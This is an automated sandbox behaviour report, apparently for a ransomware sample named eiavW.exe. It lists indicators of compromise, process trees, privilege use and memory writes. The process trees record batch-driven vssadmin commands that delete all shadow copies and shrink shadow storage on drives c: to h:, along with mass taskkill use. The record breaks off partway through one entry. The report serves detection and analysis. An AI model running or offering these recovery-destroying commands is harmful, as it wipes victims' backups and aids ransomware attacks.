Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe

Interacts with shadow copies 3 TTPs 64 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
20680	vssadmin.exe
28240	vssadmin.exe
11472	vssadmin.exe
3560	vssadmin.exe
21012	vssadmin.exe
21648	vssadmin.exe
21732	vssadmin.exe
4744	vssadmin.exe
6940	vssadmin.exe
11416	vssadmin.exe
16712	vssadmin.exe
16836	vssadmin.exe
21604	vssadmin.exe
21704	vssadmin.exe
11752	vssadmin.exe
12528	vssadmin.exe
16956	vssadmin.exe
20800	vssadmin.exe
28296	vssadmin.exe
17880	vssadmin.exe
5424	vssadmin.exe
4420	vssadmin.exe
16776	vssadmin.exe
17172	vssadmin.exe
11968	vssadmin.exe
1544	vssadmin.exe
17060	vssadmin.exe
17244	vssadmin.exe
20868	vssadmin.exe
28184	vssadmin.exe
17784	vssadmin.exe
5740	vssadmin.exe
16500	vssadmin.exe
20828	vssadmin.exe
21788	vssadmin.exe
21880	vssadmin.exe
21936	vssadmin.exe
21968	vssadmin.exe
11856	vssadmin.exe
16676	vssadmin.exe
10624	vssadmin.exe
10680	vssadmin.exe
10896	vssadmin.exe
11236	vssadmin.exe
11304	vssadmin.exe
11512	vssadmin.exe
4072	vssadmin.exe
17208	vssadmin.exe
10828	vssadmin.exe
21820	vssadmin.exe
28532	vssadmin.exe
5616	vssadmin.exe
16744	vssadmin.exe
20556	vssadmin.exe
20608	vssadmin.exe
21676	vssadmin.exe
16900	vssadmin.exe
28268	vssadmin.exe
28344	vssadmin.exe
11444	vssadmin.exe
11564	vssadmin.exe
12116	vssadmin.exe
12256	vssadmin.exe
21848	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

pid	Process
4776	taskkill.exe
4484	taskkill.exe
3420	taskkill.exe
4572	taskkill.exe
3972	taskkill.exe
2284	taskkill.exe
3176	taskkill.exe
3220	taskkill.exe
4472	taskkill.exe
4744	taskkill.exe
1384	taskkill.exe
2180	taskkill.exe
1160	taskkill.exe
2248	taskkill.exe
2972	taskkill.exe
1736	taskkill.exe
2236	taskkill.exe
1788	taskkill.exe
2796	taskkill.exe
3032	taskkill.exe
2432	taskkill.exe
2636	taskkill.exe
4352	taskkill.exe
3548	taskkill.exe
3552	taskkill.exe
1844	taskkill.exe
2680	taskkill.exe
228	taskkill.exe
5072	taskkill.exe
2676	taskkill.exe
4384	taskkill.exe
400	taskkill.exe
5036	taskkill.exe
4084	taskkill.exe
1964	taskkill.exe
4888	taskkill.exe
4760	taskkill.exe
1328	taskkill.exe
3428	taskkill.exe
2000	taskkill.exe
848	taskkill.exe
4104	taskkill.exe
1652	taskkill.exe
4148	taskkill.exe

Modifies registry class 34 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{4BC02B1A-8294-4A84-AED6-6A25B74047C2}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{578F8282-5AD3-4484-B7FB-690018133C65}	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{1DC432F8-59E1-4880-9769-AB601E4F3C63}	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{95204497-CF40-4F5E-AB59-2B1B50A8461B}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{2EAB839A-5B00-4169-9F5B-C69A6D5AF557}	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
804	eiavW.exe
804	eiavW.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
804	eiavW.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	taskkill.exe
Token: SeDebugPrivilege	228	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	3428	taskkill.exe
Token: SeDebugPrivilege	2432	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeDebugPrivilege	4744	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	4148	taskkill.exe
Token: SeDebugPrivilege	4084	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	4776	taskkill.exe
Token: SeDebugPrivilege	3548	taskkill.exe
Token: SeDebugPrivilege	4888	taskkill.exe
Token: SeDebugPrivilege	848	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	1384	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	5072	taskkill.exe
Token: SeDebugPrivilege	4472	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	3420	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	3176	taskkill.exe
Token: SeDebugPrivilege	2796	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	4384	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	400	taskkill.exe
Token: SeDebugPrivilege	804	eiavW.exe
Token: SeShutdownPrivilege	4012	RuntimeBroker.exe
Token: SeShutdownPrivilege	4012	RuntimeBroker.exe
Token: SeShutdownPrivilege	4012	RuntimeBroker.exe
Token: SeBackupPrivilege	16544	vssvc.exe
Token: SeRestorePrivilege	16544	vssvc.exe
Token: SeAuditPrivilege	16544	vssvc.exe
Token: SeShutdownPrivilege	16976	explorer.exe
Token: SeCreatePagefilePrivilege	16976	explorer.exe
Token: SeShutdownPrivilege	16976	explorer.exe
Token: SeCreatePagefilePrivilege	16976	explorer.exe
Token: SeShutdownPrivilege	16976	explorer.exe
Token: SeCreatePagefilePrivilege	16976	explorer.exe
Token: SeShutdownPrivilege	16976	explorer.exe
Token: SeCreatePagefilePrivilege	16976	explorer.exe
Token: SeShutdownPrivilege	16976	explorer.exe
Token: SeCreatePagefilePrivilege	16976	explorer.exe
Token: SeShutdownPrivilege	3792	DllHost.exe
Token: SeCreatePagefilePrivilege	3792	DllHost.exe
Token: SeShutdownPrivilege	16976	explorer.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
16480	sihost.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
16976	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe
26096	explorer.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5436	StartMenuExperienceHost.exe
25636	StartMenuExperienceHost.exe
26424	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 804 wrote to memory of 2680	804	eiavW.exe	84
PID 804 wrote to memory of 2680	804	eiavW.exe	84
PID 804 wrote to memory of 228	804	eiavW.exe	153
PID 804 wrote to memory of 228	804	eiavW.exe	153
PID 804 wrote to memory of 4572	804	eiavW.exe	88
PID 804 wrote to memory of 4572	804	eiavW.exe	88
PID 804 wrote to memory of 3972	804	eiavW.exe	90
PID 804 wrote to memory of 3972	804	eiavW.exe	90
PID 804 wrote to memory of 1328	804	eiavW.exe	393
PID 804 wrote to memory of 1328	804	eiavW.exe	393
PID 804 wrote to memory of 3428	804	eiavW.exe	500
PID 804 wrote to memory of 3428	804	eiavW.exe	500
PID 804 wrote to memory of 1652	804	eiavW.exe	551
PID 804 wrote to memory of 1652	804	eiavW.exe	551
PID 804 wrote to memory of 2432	804	eiavW.exe	98
PID 804 wrote to memory of 2432	804	eiavW.exe	98
PID 804 wrote to memory of 1160	804	eiavW.exe	557
PID 804 wrote to memory of 1160	804	eiavW.exe	557
PID 804 wrote to memory of 2636	804	eiavW.exe	496
PID 804 wrote to memory of 2636	804	eiavW.exe	496
PID 804 wrote to memory of 5036	804	eiavW.exe	104
PID 804 wrote to memory of 5036	804	eiavW.exe	104
PID 804 wrote to memory of 2248	804	eiavW.exe	634
PID 804 wrote to memory of 2248	804	eiavW.exe	634
PID 804 wrote to memory of 1964	804	eiavW.exe	645
PID 804 wrote to memory of 1964	804	eiavW.exe	645
PID 804 wrote to memory of 4744	804	eiavW.exe	717
PID 804 wrote to memory of 4744	804	eiavW.exe	717
PID 804 wrote to memory of 2972	804	eiavW.exe	350
PID 804 wrote to memory of 2972	804	eiavW.exe	350
PID 804 wrote to memory of 4084	804	eiavW.exe	392
PID 804 wrote to memory of 4084	804	eiavW.exe	392
PID 804 wrote to memory of 1736	804	eiavW.exe	374
PID 804 wrote to memory of 1736	804	eiavW.exe	374
PID 804 wrote to memory of 4148	804	eiavW.exe	326
PID 804 wrote to memory of 4148	804	eiavW.exe	326
PID 804 wrote to memory of 2000	804	eiavW.exe	122
PID 804 wrote to memory of 2000	804	eiavW.exe	122
PID 804 wrote to memory of 3220	804	eiavW.exe	269
PID 804 wrote to memory of 3220	804	eiavW.exe	269
PID 804 wrote to memory of 4776	804	eiavW.exe	355
PID 804 wrote to memory of 4776	804	eiavW.exe	355
PID 804 wrote to memory of 3548	804	eiavW.exe	128
PID 804 wrote to memory of 3548	804	eiavW.exe	128
PID 804 wrote to memory of 4888	804	eiavW.exe	325
PID 804 wrote to memory of 4888	804	eiavW.exe	325
PID 804 wrote to memory of 848	804	eiavW.exe	545
PID 804 wrote to memory of 848	804	eiavW.exe	545
PID 804 wrote to memory of 1384	804	eiavW.exe	690
PID 804 wrote to memory of 1384	804	eiavW.exe	690
PID 804 wrote to memory of 2236	804	eiavW.exe	631
PID 804 wrote to memory of 2236	804	eiavW.exe	631
PID 804 wrote to memory of 3552	804	eiavW.exe	407
PID 804 wrote to memory of 3552	804	eiavW.exe	407
PID 804 wrote to memory of 1844	804	eiavW.exe	357
PID 804 wrote to memory of 1844	804	eiavW.exe	357
PID 804 wrote to memory of 4484	804	eiavW.exe	333
PID 804 wrote to memory of 4484	804	eiavW.exe	333
PID 804 wrote to memory of 4472	804	eiavW.exe	324
PID 804 wrote to memory of 4472	804	eiavW.exe	324
PID 804 wrote to memory of 2284	804	eiavW.exe	146
PID 804 wrote to memory of 2284	804	eiavW.exe	146
PID 804 wrote to memory of 5072	804	eiavW.exe	148
PID 804 wrote to memory of 5072	804	eiavW.exe	148

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Drops startup file
- Drops file in Program Files directory
- Modifies registry class
PID:2764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:16432
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:16500
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:16676
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:16712
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16744
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16776
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16836
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16900
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16956
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:17060
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    PID:17100
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    PID:17136
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:17172
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:17208
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:17244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2832

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:3704
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4072
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:5556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5424
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    PID:5996
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5616
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5740
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    PID:3940
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4744
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    PID:1636
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    PID:396
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4420
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    PID:3984
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:6864
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:6940
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:11304
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:11416
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:11444
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:11472
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:11512
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:11564
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:11752
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:11856
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:11968
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:12116
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:12256
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    PID:12424
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:12528

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3944

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:2900

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3988

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:21452
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:21500
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:21604
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:21648
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:21676
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:21704
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:21732
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    PID:21760
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:21788
- - C:\Windows\system32\vssadmin.exe
